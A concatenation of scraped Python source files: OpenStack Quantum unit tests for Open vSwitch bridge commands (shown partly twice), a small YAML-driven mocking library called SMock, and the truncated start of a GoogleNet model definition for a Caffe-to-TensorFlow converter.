"priority=2,in_port=%s,actions=drop" % ofport],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=4,in_port=%s,dl_vlan=%s,"
"actions=strip_vlan,set_tunnel:%s,normal"
% (ofport, vid, lsw_id)],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=3,tun_id=%s,actions="
"mod_vlan_vid:%s,output:%s"
% (lsw_id, vid, ofport)], root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.add_flow(priority=2, dl_src="ca:fe:de:ad:be:ef",
actions="strip_vlan,output:0")
self.br.add_flow(priority=1, actions="normal")
self.br.add_flow(priority=2, actions="drop")
self.br.add_flow(priority=2, in_port=ofport, actions="drop")
self.br.add_flow(priority=4, in_port=ofport, dl_vlan=vid,
actions="strip_vlan,set_tunnel:%s,normal" %
(lsw_id))
self.br.add_flow(priority=3, tun_id=lsw_id,
actions="mod_vlan_vid:%s,output:%s" %
(vid, ofport))
self.mox.VerifyAll()
def test_get_port_ofport(self):
pname = "tap99"
ofport = "6"
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
self.mox.ReplayAll()
self.assertEqual(self.br.get_port_ofport(pname), ofport)
self.mox.VerifyAll()
def test_get_datapath_id(self):
datapath_id = '"0000b67f4fbcc149"'
utils.execute(["ovs-vsctl", self.TO, "get",
"Bridge", self.BR_NAME, "datapath_id"],
root_helper=self.root_helper).AndReturn(datapath_id)
self.mox.ReplayAll()
self.assertEqual(self.br.get_datapath_id(), datapath_id.strip('"'))
self.mox.VerifyAll()
def test_count_flows(self):
utils.execute(["ovs-ofctl", "dump-flows", self.BR_NAME],
root_helper=self.root_helper).AndReturn('ignore'
'\nflow-1\n')
self.mox.ReplayAll()
# counts the number of flows as total lines of output - 2
self.assertEqual(self.br.count_flows(), 1)
self.mox.VerifyAll()
def test_delete_flow(self):
ofport = "5"
lsw_id = 40
vid = 39
utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
"in_port=" + ofport], root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
"tun_id=%s" % lsw_id], root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
"dl_vlan=%s" % vid], root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.delete_flows(in_port=ofport)
self.br.delete_flows(tun_id=lsw_id)
self.br.delete_flows(dl_vlan=vid)
self.mox.VerifyAll()
def test_add_tunnel_port(self):
pname = "tap99"
ip = "9.9.9.9"
ofport = "6"
utils.execute(["ovs-vsctl", self.TO, "add-port",
self.BR_NAME, pname], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "type=gre"], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "options:remote_ip=" + ip],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "options:in_key=flow"],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "options:out_key=flow"],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
self.mox.ReplayAll()
self.assertEqual(self.br.add_tunnel_port(pname, ip), ofport)
self.mox.VerifyAll()
def test_add_patch_port(self):
pname = "tap99"
peer = "bar10"
ofport = "6"
utils.execute(["ovs-vsctl", self.TO, "add-port",
self.BR_NAME, pname], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "type=patch"], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set",
"Interface", pname, "options:peer=" + peer],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
self.mox.ReplayAll()
self.assertEqual(self.br.add_patch_port(pname, peer), ofport)
self.mox.VerifyAll()
def _test_get_vif_ports(self, is_xen=False):
pname = "tap99"
ofport = "6"
vif_id = uuidutils.generate_uuid()
mac = "ca:fe:de:ad:be:ef"
utils.execute(["ovs-vsctl", self.TO, "list-ports", self.BR_NAME],
root_helper=self.root_helper).AndReturn("%s\n" % pname)
if is_xen:
external_ids = ('{xs-vif-uuid="%s", attached-mac="%s"}'
% (vif_id, mac))
else:
external_ids = ('{iface-id="%s", attached-mac="%s"}'
% (vif_id, mac))
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "external_ids"],
root_helper=self.root_helper).AndReturn(external_ids)
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
if is_xen:
utils.execute(["xe", "vif-param-get", "param-name=other-config",
"param-key=nicira-iface-id", "uuid=" + vif_id],
root_helper=self.root_helper).AndReturn(vif_id)
self.mox.ReplayAll()
ports = self.br.get_vif_ports()
self.assertEqual(1, len(ports))
self.assertEqual(ports[0].port_name, pname)
self.assertEqual(ports[0].ofport, ofport)
self.assertEqual(ports[0].vif_id, vif_id)
self.assertEqual(ports[0].vif_mac, mac)
self.assertEqual(ports[0].switch.br_name, self.BR_NAME)
self.mox.VerifyAll()
def test_get_vif_ports_nonxen(self):
self._test_get_vif_ports(False)
def test_get_vif_ports_xen(self):
self._test_get_vif_ports(True)
def test_clear_db_attribute(self):
pname = "tap77"
utils.execute(["ovs-vsctl", self.TO, "clear", "Port",
pname, "tag"], root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.clear_db_attribute("Port", pname, "tag")
self.mox.VerifyAll()
def test_port_id_regex(self):
result = ('external_ids : {attached-mac="fa:16:3e:23:5b:f2",'
' iface-id="5c1321a7-c73f-4a77-95e6-9f86402e5c8f",'
' iface-status=active}\nname :'
' "dhc5c1321a7-c7"\nofport : 2\n')
match = self.br.re_id.search(result)
vif_mac = match.group('vif_mac')
vif_id = match.group('vif_id')
port_name = match.group('port_name')
ofport = int(match.group('ofport'))
self.assertEqual(vif_mac, 'fa:16:3e:23:5b:f2')
self.assertEqual(vif_id, '5c1321a7-c73f-4a77-95e6-9f86402e5c8f')
self.assertEqual(port_name, 'dhc5c1321a7-c7')
self.assertEqual(ofport, 2)
def test_iface_to_br(self):
iface = 'tap0'
br = 'br-int'
root_helper = 'sudo'
utils.execute(["ovs-vsctl", self.TO, "iface-to-br", iface],
root_helper=root_helper).AndReturn('br-int')
self.mox.ReplayAll()
self.assertEqual(ovs_lib.get_bridge_for_iface(root_helper, iface), br)
self.mox.VerifyAll()
def test_iface_to_br(self):
iface = 'tap0'
br = 'br-int'
root_helper = 'sudo'
utils.execute(["ovs-vsctl", self.TO, "iface-to-br", iface],
root_helper=root_helper).AndRaise(Exception)
self.mox.ReplayAll()
self.assertIsNone(ovs_lib.get_bridge_for_iface(root_helper, iface))
self.mox.VerifyAll()
def test_delete_all_ports(self):
self.mox.StubOutWithMock(self.br, 'get_port_name_list')
self.br.get_port_name_list().AndReturn(['port1'])
self.mox.StubOutWithMock(self.br, 'delete_port')
self.br.delete_port('port1')
self.mox.ReplayAll()
self.br.delete_ports(all_ports=True)
self.mox.VerifyAll()
def test_delete_quantum_ports(self):
port1 = ovs_lib.VifPort('tap1234', 1, uuidutils.generate_uuid(),
'ca:fe:de:ad:be:ef', 'br')
port2 = ovs_lib.VifPort('tap5678', 2, uuidutils.generate_uuid(),
'ca:ee:de:ad:be:ef', 'br')
ports = [port1, port2]
self.mox.StubOutWithMock(self.br, 'get_vif_ports')
self.br.get_vif_ports().AndReturn([port1, port2])
self.mox.StubOutWithMock(self.br, 'delete_port')
self.br.delete_port('tap1234')
self.br.delete_port('tap5678')
self.mox.ReplayAll()
self.br.delete_ports(all_ports=False)
self.mox.VerifyAll()
def test_get_bridges(self):
bridges = ['br-int', 'br-ex']
root_helper = 'sudo'
utils.execute(["ovs-vsctl", self.TO, "list-br"],
root_helper=root_helper).AndReturn('br-int\nbr-ex\n')
self.mox.ReplayAll()
self.assertEqual(ovs_lib.get_bridges(root_helper), bridges)
self.mox.VerifyAll()
| 40.616046
| 78
| 0.567478
|
import mox
from quantum.agent.linux import ovs_lib, utils
from quantum.openstack.common import uuidutils
from quantum.tests import base
class OVS_Lib_Test(base.BaseTestCase):
def setUp(self):
super(OVS_Lib_Test, self).setUp()
self.BR_NAME = "br-int"
self.TO = "--timeout=2"
self.mox = mox.Mox()
self.root_helper = 'sudo'
self.br = ovs_lib.OVSBridge(self.BR_NAME, self.root_helper)
self.mox.StubOutWithMock(utils, "execute")
self.addCleanup(self.mox.UnsetStubs)
def test_vifport(self):
self.mox.ReplayAll()
pname = "vif1.0"
ofport = 5
vif_id = uuidutils.generate_uuid()
mac = "ca:fe:de:ad:be:ef"
port = ovs_lib.VifPort(pname, ofport, vif_id, mac, self.br)
self.assertEqual(port.port_name, pname)
self.assertEqual(port.ofport, ofport)
self.assertEqual(port.vif_id, vif_id)
self.assertEqual(port.vif_mac, mac)
self.assertEqual(port.switch.br_name, self.BR_NAME)
foo = str(port)
self.mox.VerifyAll()
def test_reset_bridge(self):
utils.execute(["ovs-vsctl", self.TO, "--",
"--if-exists", "del-br", self.BR_NAME],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "add-br", self.BR_NAME],
root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.reset_bridge()
self.mox.VerifyAll()
def test_delete_port(self):
pname = "tap5"
utils.execute(["ovs-vsctl", self.TO, "--", "--if-exists",
"del-port", self.BR_NAME, pname],
root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.delete_port(pname)
self.mox.VerifyAll()
def test_add_flow(self):
ofport = "99"
vid = 4000
lsw_id = 18
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=2,dl_src=ca:fe:de:ad:be:ef"
",actions=strip_vlan,output:0"],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=1,actions=normal"],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=2,actions=drop"],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=2,in_port=%s,actions=drop" % ofport],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=4,in_port=%s,dl_vlan=%s,"
"actions=strip_vlan,set_tunnel:%s,normal"
% (ofport, vid, lsw_id)],
root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "add-flow", self.BR_NAME,
"hard_timeout=0,idle_timeout=0,"
"priority=3,tun_id=%s,actions="
"mod_vlan_vid:%s,output:%s"
% (lsw_id, vid, ofport)], root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.add_flow(priority=2, dl_src="ca:fe:de:ad:be:ef",
actions="strip_vlan,output:0")
self.br.add_flow(priority=1, actions="normal")
self.br.add_flow(priority=2, actions="drop")
self.br.add_flow(priority=2, in_port=ofport, actions="drop")
self.br.add_flow(priority=4, in_port=ofport, dl_vlan=vid,
actions="strip_vlan,set_tunnel:%s,normal" %
(lsw_id))
self.br.add_flow(priority=3, tun_id=lsw_id,
actions="mod_vlan_vid:%s,output:%s" %
(vid, ofport))
self.mox.VerifyAll()
def test_get_port_ofport(self):
pname = "tap99"
ofport = "6"
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
self.mox.ReplayAll()
self.assertEqual(self.br.get_port_ofport(pname), ofport)
self.mox.VerifyAll()
def test_get_datapath_id(self):
datapath_id = '"0000b67f4fbcc149"'
utils.execute(["ovs-vsctl", self.TO, "get",
"Bridge", self.BR_NAME, "datapath_id"],
root_helper=self.root_helper).AndReturn(datapath_id)
self.mox.ReplayAll()
self.assertEqual(self.br.get_datapath_id(), datapath_id.strip('"'))
self.mox.VerifyAll()
def test_count_flows(self):
utils.execute(["ovs-ofctl", "dump-flows", self.BR_NAME],
root_helper=self.root_helper).AndReturn('ignore'
'\nflow-1\n')
self.mox.ReplayAll()
# counts the number of flows as total lines of output - 2
self.assertEqual(self.br.count_flows(), 1)
self.mox.VerifyAll()
def test_delete_flow(self):
ofport = "5"
lsw_id = 40
vid = 39
utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
"in_port=" + ofport], root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
"tun_id=%s" % lsw_id], root_helper=self.root_helper)
utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
"dl_vlan=%s" % vid], root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.delete_flows(in_port=ofport)
self.br.delete_flows(tun_id=lsw_id)
self.br.delete_flows(dl_vlan=vid)
self.mox.VerifyAll()
def test_add_tunnel_port(self):
pname = "tap99"
ip = "9.9.9.9"
ofport = "6"
utils.execute(["ovs-vsctl", self.TO, "add-port",
self.BR_NAME, pname], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "type=gre"], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "options:remote_ip=" + ip],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "options:in_key=flow"],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "options:out_key=flow"],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
self.mox.ReplayAll()
self.assertEqual(self.br.add_tunnel_port(pname, ip), ofport)
self.mox.VerifyAll()
def test_add_patch_port(self):
pname = "tap99"
peer = "bar10"
ofport = "6"
utils.execute(["ovs-vsctl", self.TO, "add-port",
self.BR_NAME, pname], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
pname, "type=patch"], root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "set",
"Interface", pname, "options:peer=" + peer],
root_helper=self.root_helper)
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
self.mox.ReplayAll()
self.assertEqual(self.br.add_patch_port(pname, peer), ofport)
self.mox.VerifyAll()
def _test_get_vif_ports(self, is_xen=False):
pname = "tap99"
ofport = "6"
vif_id = uuidutils.generate_uuid()
mac = "ca:fe:de:ad:be:ef"
utils.execute(["ovs-vsctl", self.TO, "list-ports", self.BR_NAME],
root_helper=self.root_helper).AndReturn("%s\n" % pname)
if is_xen:
external_ids = ('{xs-vif-uuid="%s", attached-mac="%s"}'
% (vif_id, mac))
else:
external_ids = ('{iface-id="%s", attached-mac="%s"}'
% (vif_id, mac))
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "external_ids"],
root_helper=self.root_helper).AndReturn(external_ids)
utils.execute(["ovs-vsctl", self.TO, "get",
"Interface", pname, "ofport"],
root_helper=self.root_helper).AndReturn(ofport)
if is_xen:
utils.execute(["xe", "vif-param-get", "param-name=other-config",
"param-key=nicira-iface-id", "uuid=" + vif_id],
root_helper=self.root_helper).AndReturn(vif_id)
self.mox.ReplayAll()
ports = self.br.get_vif_ports()
self.assertEqual(1, len(ports))
self.assertEqual(ports[0].port_name, pname)
self.assertEqual(ports[0].ofport, ofport)
self.assertEqual(ports[0].vif_id, vif_id)
self.assertEqual(ports[0].vif_mac, mac)
self.assertEqual(ports[0].switch.br_name, self.BR_NAME)
self.mox.VerifyAll()
def test_get_vif_ports_nonxen(self):
self._test_get_vif_ports(False)
def test_get_vif_ports_xen(self):
self._test_get_vif_ports(True)
def test_clear_db_attribute(self):
pname = "tap77"
utils.execute(["ovs-vsctl", self.TO, "clear", "Port",
pname, "tag"], root_helper=self.root_helper)
self.mox.ReplayAll()
self.br.clear_db_attribute("Port", pname, "tag")
self.mox.VerifyAll()
def test_port_id_regex(self):
result = ('external_ids : {attached-mac="fa:16:3e:23:5b:f2",'
' iface-id="5c1321a7-c73f-4a77-95e6-9f86402e5c8f",'
' iface-status=active}\nname :'
' "dhc5c1321a7-c7"\nofport : 2\n')
match = self.br.re_id.search(result)
vif_mac = match.group('vif_mac')
vif_id = match.group('vif_id')
port_name = match.group('port_name')
ofport = int(match.group('ofport'))
self.assertEqual(vif_mac, 'fa:16:3e:23:5b:f2')
self.assertEqual(vif_id, '5c1321a7-c73f-4a77-95e6-9f86402e5c8f')
self.assertEqual(port_name, 'dhc5c1321a7-c7')
self.assertEqual(ofport, 2)
def test_iface_to_br(self):
iface = 'tap0'
br = 'br-int'
root_helper = 'sudo'
utils.execute(["ovs-vsctl", self.TO, "iface-to-br", iface],
root_helper=root_helper).AndReturn('br-int')
self.mox.ReplayAll()
self.assertEqual(ovs_lib.get_bridge_for_iface(root_helper, iface), br)
self.mox.VerifyAll()
def test_iface_to_br(self):
iface = 'tap0'
br = 'br-int'
root_helper = 'sudo'
utils.execute(["ovs-vsctl", self.TO, "iface-to-br", iface],
root_helper=root_helper).AndRaise(Exception)
self.mox.ReplayAll()
self.assertIsNone(ovs_lib.get_bridge_for_iface(root_helper, iface))
self.mox.VerifyAll()
def test_delete_all_ports(self):
self.mox.StubOutWithMock(self.br, 'get_port_name_list')
self.br.get_port_name_list().AndReturn(['port1'])
self.mox.StubOutWithMock(self.br, 'delete_port')
self.br.delete_port('port1')
self.mox.ReplayAll()
self.br.delete_ports(all_ports=True)
self.mox.VerifyAll()
def test_delete_quantum_ports(self):
port1 = ovs_lib.VifPort('tap1234', 1, uuidutils.generate_uuid(),
'ca:fe:de:ad:be:ef', 'br')
port2 = ovs_lib.VifPort('tap5678', 2, uuidutils.generate_uuid(),
'ca:ee:de:ad:be:ef', 'br')
ports = [port1, port2]
self.mox.StubOutWithMock(self.br, 'get_vif_ports')
self.br.get_vif_ports().AndReturn([port1, port2])
self.mox.StubOutWithMock(self.br, 'delete_port')
self.br.delete_port('tap1234')
self.br.delete_port('tap5678')
self.mox.ReplayAll()
self.br.delete_ports(all_ports=False)
self.mox.VerifyAll()
def test_get_bridges(self):
bridges = ['br-int', 'br-ex']
root_helper = 'sudo'
utils.execute(["ovs-vsctl", self.TO, "list-br"],
root_helper=root_helper).AndReturn('br-int\nbr-ex\n')
self.mox.ReplayAll()
self.assertEqual(ovs_lib.get_bridges(root_helper), bridges)
self.mox.VerifyAll()
| true
| true
|
790c759b73c878a7b39473583ec0ffc5dfbb10f0
| 6,196
|
py
|
Python
|
smock.py
|
serverboards/serverboards-plugin-google-drive
|
2295df2c8c42d1667e80d00d2038aabd2fe15b62
|
[
"Apache-2.0"
] | null | null | null |
smock.py
|
serverboards/serverboards-plugin-google-drive
|
2295df2c8c42d1667e80d00d2038aabd2fe15b62
|
[
"Apache-2.0"
] | null | null | null |
smock.py
|
serverboards/serverboards-plugin-google-drive
|
2295df2c8c42d1667e80d00d2038aabd2fe15b62
|
[
"Apache-2.0"
] | null | null | null |
import json
import yaml
"""
SMock -- Serverboards Mock library -- Mock comfortably.
This library helps to mock function and method calls, getting the data
from an external yaml file.
"""
class MockWrapper:
"""
Wraps all the data returned by the mocked function to behave like a
dictionary, like an object, like a function, like a jsonable dict...
like almost everything you may need
"""
def __init__(self, data):
self.__data = data
def __getattr__(self, key):
if key not in self.__data:
raise KeyError("'%s' not found in %s" % (key, self.__data.keys()))
return self.__getitem__(key)
def __call__(self):
return wrapped(self.__data)
def __getitem__(self, key):
val = self.__data[key]
if isinstance(val, (int, str)):
return val
return wrapped(val)
def __str__(self):
return str(self.__data)
def __repr__(self):
return repr(self.__data)
def __eq__(self, other):
return self.__data.__eq__(other)
def __le__(self, other):
return self.__data.__le__(other)
def __ge__(self, other):
return self.__data.__ge__(other)
def __lt__(self, other):
return self.__data.__lt__(other)
def __gt__(self, other):
return self.__data.__gt__(other)
def __len__(self):
return self.__data.__len__()
def keys(self):
return self.__data.keys()
def get(self, key, defv=None):
return self.__data.get(key, defv)
class MockWrapperList(MockWrapper, list):
def __init__(self, data):
MockWrapper.__init__(self, data)
list.__init__(self, data)
class MockWrapperDict(MockWrapper, dict):
def __init__(self, data):
MockWrapper.__init__(self, data)
dict.__init__(self, data)
def wrapped(data):
if isinstance(data, dict):
return MockWrapperDict(data)
if isinstance(data, list):
return MockWrapperList(data)
return MockWrapper(data)
def mock_match(A, B):
"""
Checked for params on a mocked function is as expected
It is necesary as sometimes we get a tuple and at the mock data we have
lists.
Examples:
```
>>> mock_match("A", "A")
True
>>> mock_match("A", "B")
False
>>> mock_match(["A", "B", "C"], ["A", "B", "C"])
True
>>> mock_match(["A", "B", "C"], "*")
True
```
"""
if B == '*': # always match
return True
if isinstance(A, (tuple, list)):
return all(mock_match(a, b) for (a, b) in zip(A, B))
return A == B
def mock_res(name, data, args=[], kwargs={}):
"""
Given a name, data and call parameters, returns the mocked response
If there is no matching response, raises an exception that can be used to
prepare the mock data.
This can be used for situations where you mock some function like data;
for example at [Serverboards](https://serverboards.io), we use it to
mock RPC calls.
Its also used internally on every other mocking.
"""
data = data.get(name)
if not data:
raise Exception(
"unknown method for mocking: \n%s:\n - args: %s\n kwargs: %s\n response: ...\n" % (
name, json.dumps(args), json.dumps(kwargs)
)
)
for res in data:
if (mock_match(args, res.get("args")) and
mock_match(kwargs, res.get("kwargs", {}))):
if 'error' in res:
raise Exception(res["error"])
response = res["response"]
if isinstance(response, (int, str)):
return response
return wrapped(response)
raise Exception(
"unknown data for mocking: \n%s:\n - args: %s\n kwargs: %s\n response: ...\n" % (
name, json.dumps(args), json.dumps(kwargs)
)
)
def mock_method(name, data):
"""
Returns a function that mocks an original function.
"""
def mockf(*args, **kwargs):
return mock_res(name, data, args, kwargs)
return mockf
def mock_method_async(name, data):
"""
Returns an async function that mocks an original async function
"""
async def mockf(*args, **kwargs):
return mock_res(name, data, args, kwargs)
return mockf
class SMock:
"""
Encapsulates mocking calls so it's easier to load data and mock methods
Example:
```python
>>> import requests
>>> smocked = SMock("tests/data.yaml")
>>> requests.get = smocked.mock_method("requests.get")
>>> res = requests.get("https://mocked.url")
>>> res.status_code
200
>>> res.content
'Gocha!'
>>> res.json()
{'text': 'Gocha too!'}
```
The mock file is a yaml file with each mocked function as keys, and
`args`/`kwargs` as calling args and kwargs, and `response` the response.
Check `tests/data.yaml` for an example at the source code.
"""
def __init__(self, mockfile):
with open(mockfile) as fd:
self._data = yaml.load(fd)
def mock_res(self, name, args=[], kwargs={}):
"""
Calls `mock_res`
Mock by args:
```
>>> smock = SMock("tests/data.yaml")
>>> res = smock.mock_res("requests.get", ["https://mocked.url"])
>>> res.status_code
200
```
Using "*" as args, as fallback. As there is no kwargs, use default:
```
>>> res = smock.mock_res("requests.get", ["https://error.mocked.url"])
>>> res.status_code
404
```
Using "*" as kwargs:
```
>>> res = smock.mock_res("requests.get",
... ["https://mocked.url"],
... {'data': 'data'})
>>> res.status_code
200
>>> res.content
'Mocked query'
```
"""
return mock_res(name, self._data, args, kwargs)
def mock_method(self, name):
"""
Calls `mock_method`
"""
return mock_method(name, self._data)
async def mock_method_async(self, name):
"""
Calls `mock_method_async`
"""
return await mock_method_async(name, self._data)
| 25.497942
| 102
| 0.576017
|
import json
import yaml
class MockWrapper:
def __init__(self, data):
self.__data = data
def __getattr__(self, key):
if key not in self.__data:
raise KeyError("'%s' not found in %s" % (key, self.__data.keys()))
return self.__getitem__(key)
def __call__(self):
return wrapped(self.__data)
def __getitem__(self, key):
val = self.__data[key]
if isinstance(val, (int, str)):
return val
return wrapped(val)
def __str__(self):
return str(self.__data)
def __repr__(self):
return repr(self.__data)
def __eq__(self, other):
return self.__data.__eq__(other)
def __le__(self, other):
return self.__data.__le__(other)
def __ge__(self, other):
return self.__data.__ge__(other)
def __lt__(self, other):
return self.__data.__lt__(other)
def __gt__(self, other):
return self.__data.__gt__(other)
def __len__(self):
return self.__data.__len__()
def keys(self):
return self.__data.keys()
def get(self, key, defv=None):
return self.__data.get(key, defv)
class MockWrapperList(MockWrapper, list):
def __init__(self, data):
MockWrapper.__init__(self, data)
list.__init__(self, data)
class MockWrapperDict(MockWrapper, dict):
def __init__(self, data):
MockWrapper.__init__(self, data)
dict.__init__(self, data)
def wrapped(data):
if isinstance(data, dict):
return MockWrapperDict(data)
if isinstance(data, list):
return MockWrapperList(data)
return MockWrapper(data)
def mock_match(A, B):
if B == '*':
return True
if isinstance(A, (tuple, list)):
return all(mock_match(a, b) for (a, b) in zip(A, B))
return A == B
def mock_res(name, data, args=[], kwargs={}):
data = data.get(name)
if not data:
raise Exception(
"unknown method for mocking: \n%s:\n - args: %s\n kwargs: %s\n response: ...\n" % (
name, json.dumps(args), json.dumps(kwargs)
)
)
for res in data:
if (mock_match(args, res.get("args")) and
mock_match(kwargs, res.get("kwargs", {}))):
if 'error' in res:
raise Exception(res["error"])
response = res["response"]
if isinstance(response, (int, str)):
return response
return wrapped(response)
raise Exception(
"unknown data for mocking: \n%s:\n - args: %s\n kwargs: %s\n response: ...\n" % (
name, json.dumps(args), json.dumps(kwargs)
)
)
def mock_method(name, data):
def mockf(*args, **kwargs):
return mock_res(name, data, args, kwargs)
return mockf
def mock_method_async(name, data):
async def mockf(*args, **kwargs):
return mock_res(name, data, args, kwargs)
return mockf
class SMock:
def __init__(self, mockfile):
with open(mockfile) as fd:
self._data = yaml.load(fd)
def mock_res(self, name, args=[], kwargs={}):
return mock_res(name, self._data, args, kwargs)
def mock_method(self, name):
return mock_method(name, self._data)
async def mock_method_async(self, name):
return await mock_method_async(name, self._data)
| true
| true
|
790c77c112f04ac750b068e50533564b671bd615
| 7,851
|
py
|
Python
|
caffe-tensorflow/examples/imagenet/models/googlenet.py
|
petercheng00/PSPNet-Keras-tensorflow
|
d50583786a3e8782dd1b735d268e57392cd8c646
|
[
"MIT"
] | 3,209
|
2015-11-10T06:52:59.000Z
|
2022-03-10T05:17:28.000Z
|
caffe-tensorflow/examples/imagenet/models/googlenet.py
|
petercheng00/PSPNet-Keras-tensorflow
|
d50583786a3e8782dd1b735d268e57392cd8c646
|
[
"MIT"
] | 174
|
2015-11-10T21:32:54.000Z
|
2021-11-09T15:51:30.000Z
|
caffe-tensorflow/examples/imagenet/models/googlenet.py
|
petercheng00/PSPNet-Keras-tensorflow
|
d50583786a3e8782dd1b735d268e57392cd8c646
|
[
"MIT"
] | 1,218
|
2015-11-10T23:55:48.000Z
|
2022-01-07T07:36:57.000Z
|
from kaffe.tensorflow import Network
class GoogleNet(Network):
def setup(self):
(self.feed('data')
.conv(7, 7, 64, 2, 2, name='conv1_7x7_s2')
.max_pool(3, 3, 2, 2, name='pool1_3x3_s2')
.lrn(2, 2e-05, 0.75, name='pool1_norm1')
.conv(1, 1, 64, 1, 1, name='conv2_3x3_reduce')
.conv(3, 3, 192, 1, 1, name='conv2_3x3')
.lrn(2, 2e-05, 0.75, name='conv2_norm2')
.max_pool(3, 3, 2, 2, name='pool2_3x3_s2')
.conv(1, 1, 64, 1, 1, name='inception_3a_1x1'))
(self.feed('pool2_3x3_s2')
.conv(1, 1, 96, 1, 1, name='inception_3a_3x3_reduce')
.conv(3, 3, 128, 1, 1, name='inception_3a_3x3'))
(self.feed('pool2_3x3_s2')
.conv(1, 1, 16, 1, 1, name='inception_3a_5x5_reduce')
.conv(5, 5, 32, 1, 1, name='inception_3a_5x5'))
(self.feed('pool2_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_3a_pool')
.conv(1, 1, 32, 1, 1, name='inception_3a_pool_proj'))
(self.feed('inception_3a_1x1',
'inception_3a_3x3',
'inception_3a_5x5',
'inception_3a_pool_proj')
.concat(3, name='inception_3a_output')
.conv(1, 1, 128, 1, 1, name='inception_3b_1x1'))
(self.feed('inception_3a_output')
.conv(1, 1, 128, 1, 1, name='inception_3b_3x3_reduce')
.conv(3, 3, 192, 1, 1, name='inception_3b_3x3'))
(self.feed('inception_3a_output')
.conv(1, 1, 32, 1, 1, name='inception_3b_5x5_reduce')
.conv(5, 5, 96, 1, 1, name='inception_3b_5x5'))
(self.feed('inception_3a_output')
.max_pool(3, 3, 1, 1, name='inception_3b_pool')
.conv(1, 1, 64, 1, 1, name='inception_3b_pool_proj'))
(self.feed('inception_3b_1x1',
'inception_3b_3x3',
'inception_3b_5x5',
'inception_3b_pool_proj')
.concat(3, name='inception_3b_output')
.max_pool(3, 3, 2, 2, name='pool3_3x3_s2')
.conv(1, 1, 192, 1, 1, name='inception_4a_1x1'))
(self.feed('pool3_3x3_s2')
.conv(1, 1, 96, 1, 1, name='inception_4a_3x3_reduce')
.conv(3, 3, 208, 1, 1, name='inception_4a_3x3'))
(self.feed('pool3_3x3_s2')
.conv(1, 1, 16, 1, 1, name='inception_4a_5x5_reduce')
.conv(5, 5, 48, 1, 1, name='inception_4a_5x5'))
(self.feed('pool3_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_4a_pool')
.conv(1, 1, 64, 1, 1, name='inception_4a_pool_proj'))
(self.feed('inception_4a_1x1',
'inception_4a_3x3',
'inception_4a_5x5',
'inception_4a_pool_proj')
.concat(3, name='inception_4a_output')
.conv(1, 1, 160, 1, 1, name='inception_4b_1x1'))
(self.feed('inception_4a_output')
.conv(1, 1, 112, 1, 1, name='inception_4b_3x3_reduce')
.conv(3, 3, 224, 1, 1, name='inception_4b_3x3'))
(self.feed('inception_4a_output')
